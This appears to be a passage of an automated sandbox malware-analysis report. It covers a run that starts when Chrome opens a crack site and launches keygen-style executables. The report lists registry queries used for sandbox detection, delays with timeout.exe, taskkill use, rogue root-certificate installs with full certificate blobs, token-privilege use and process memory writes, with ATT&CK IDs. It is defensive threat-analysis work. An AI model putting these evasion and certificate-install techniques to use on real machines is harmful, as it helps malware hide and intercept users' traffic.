Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

E309.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	E309.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	E309.tmp.exe

Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

7672 timeout.exe
4416 timeout.exe
5808 timeout.exe
6788 timeout.exe
7500 timeout.exe
3196 timeout.exe
4864 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1720 taskkill.exe
8396 taskkill.exe

pid	process
7672	timeout.exe
4416	timeout.exe
5808	timeout.exe
6788	timeout.exe
7500	timeout.exe
3196	timeout.exe
4864	timeout.exe

pid	process
1720	taskkill.exe
8396	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	chrome.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

keygen-step-2.exeSetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs ping.exe 1 TTPs 40 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1548	PING.EXE
4644	PING.EXE
4736	PING.EXE
6296	PING.EXE
7760	PING.EXE
6016	PING.EXE
7588	PING.EXE
5580	PING.EXE
4448	PING.EXE
2632	PING.EXE
4772	PING.EXE
4944	PING.EXE
5288	PING.EXE
5528	PING.EXE
8096	PING.EXE
6728	PING.EXE
5744	PING.EXE
5144	PING.EXE
6712	PING.EXE
6772	PING.EXE
1524	PING.EXE
7208	PING.EXE
6880	PING.EXE
7312	PING.EXE
1420	PING.EXE
5852	PING.EXE
8128	PING.EXE
6496	PING.EXE
2444	PING.EXE
4796	PING.EXE
4968	PING.EXE
4424	PING.EXE
4860	PING.EXE
5172	PING.EXE
7044	PING.EXE
7348	PING.EXE
4336	PING.EXE
6684	PING.EXE
32	PING.EXE
4960	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exekey.exe1613221200584.exeWerFault.exe1613221205193.exeE309.tmp.exeWerFault.exe

pid	process
1900	chrome.exe
1900	chrome.exe
1156	chrome.exe
1156	chrome.exe
4760	chrome.exe
4760	chrome.exe
4380	chrome.exe
4380	chrome.exe
4212	chrome.exe
4212	chrome.exe
4420	chrome.exe
4420	chrome.exe
4856	chrome.exe
4856	chrome.exe
4972	chrome.exe
4972	chrome.exe
4120	chrome.exe
4120	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
4956	key.exe
4956	key.exe
4708	1613221200584.exe
4708	1613221200584.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
1584	WerFault.exe
936	1613221205193.exe
936	1613221205193.exe
4216	E309.tmp.exe
4216	E309.tmp.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe
4768	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4120	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe
Token: SeLockMemoryPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeMachineAccountPrivilege	4540	msiexec.exe
Token: SeTcbPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4540	msiexec.exe
Token: SeTakeOwnershipPrivilege	4540	msiexec.exe
Token: SeLoadDriverPrivilege	4540	msiexec.exe
Token: SeSystemProfilePrivilege	4540	msiexec.exe
Token: SeSystemtimePrivilege	4540	msiexec.exe
Token: SeProfSingleProcessPrivilege	4540	msiexec.exe
Token: SeIncBasePriorityPrivilege	4540	msiexec.exe
Token: SeCreatePagefilePrivilege	4540	msiexec.exe
Token: SeCreatePermanentPrivilege	4540	msiexec.exe
Token: SeBackupPrivilege	4540	msiexec.exe
Token: SeRestorePrivilege	4540	msiexec.exe
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeDebugPrivilege	4540	msiexec.exe
Token: SeAuditPrivilege	4540	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4540	msiexec.exe
Token: SeChangeNotifyPrivilege	4540	msiexec.exe
Token: SeRemoteShutdownPrivilege	4540	msiexec.exe
Token: SeUndockPrivilege	4540	msiexec.exe
Token: SeSyncAgentPrivilege	4540	msiexec.exe
Token: SeEnableDelegationPrivilege	4540	msiexec.exe
Token: SeManageVolumePrivilege	4540	msiexec.exe
Token: SeImpersonatePrivilege	4540	msiexec.exe
Token: SeCreateGlobalPrivilege	4540	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe
Token: SeLockMemoryPrivilege	4540	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4540	msiexec.exe
Token: SeMachineAccountPrivilege	4540	msiexec.exe
Token: SeTcbPrivilege	4540	msiexec.exe
Token: SeSecurityPrivilege	4540	msiexec.exe
Token: SeTakeOwnershipPrivilege	4540	msiexec.exe
Token: SeLoadDriverPrivilege	4540	msiexec.exe
Token: SeSystemProfilePrivilege	4540	msiexec.exe
Token: SeSystemtimePrivilege	4540	msiexec.exe
Token: SeProfSingleProcessPrivilege	4540	msiexec.exe
Token: SeIncBasePriorityPrivilege	4540	msiexec.exe
Token: SeCreatePagefilePrivilege	4540	msiexec.exe
Token: SeCreatePermanentPrivilege	4540	msiexec.exe
Token: SeBackupPrivilege	4540	msiexec.exe
Token: SeRestorePrivilege	4540	msiexec.exe
Token: SeShutdownPrivilege	4540	msiexec.exe
Token: SeDebugPrivilege	4540	msiexec.exe
Token: SeAuditPrivilege	4540	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4540	msiexec.exe
Token: SeChangeNotifyPrivilege	4540	msiexec.exe
Token: SeRemoteShutdownPrivilege	4540	msiexec.exe
Token: SeUndockPrivilege	4540	msiexec.exe
Token: SeSyncAgentPrivilege	4540	msiexec.exe
Token: SeEnableDelegationPrivilege	4540	msiexec.exe
Token: SeManageVolumePrivilege	4540	msiexec.exe
Token: SeImpersonatePrivilege	4540	msiexec.exe
Token: SeCreateGlobalPrivilege	4540	msiexec.exe
Token: SeCreateTokenPrivilege	4540	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4540	msiexec.exe
Token: SeLockMemoryPrivilege	4540	msiexec.exe

Suspicious use of FindShellTrayWindow 24 IoCs

Processes:

chrome.exemsiexec.exemsiexec.exemsiexec.exe

pid	process
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
1156	chrome.exe
4540	msiexec.exe
4540	msiexec.exe
3676	msiexec.exe
5976	msiexec.exe

Suspicious use of SendNotifyMessage 8 IoCs

Processes:

chrome.exe

pid process

1156 chrome.exe
1156 chrome.exe
1156 chrome.exe
1156 chrome.exe
1156 chrome.exe
1156 chrome.exe
1156 chrome.exe
1156 chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1156 wrote to memory of 1244	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1244	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 3408	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1900	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1900	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe
PID 1156 wrote to memory of 1000	1156	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cracknet.net/
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa8,0xd4,0x7ffc94dd6e00,0x7ffc94dd6e10,0x7ffc94dd6e20
2⤵
PID:1244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1480 /prefetch:2
2⤵
PID:3408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1864 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:8
2⤵
PID:1000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
2⤵
PID:220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
2⤵
PID:192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
2⤵
PID:700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
2⤵
PID:1548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
2⤵
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
2⤵
PID:3752

C:\Program Files\Google\Chrome\Application\chrome.exe
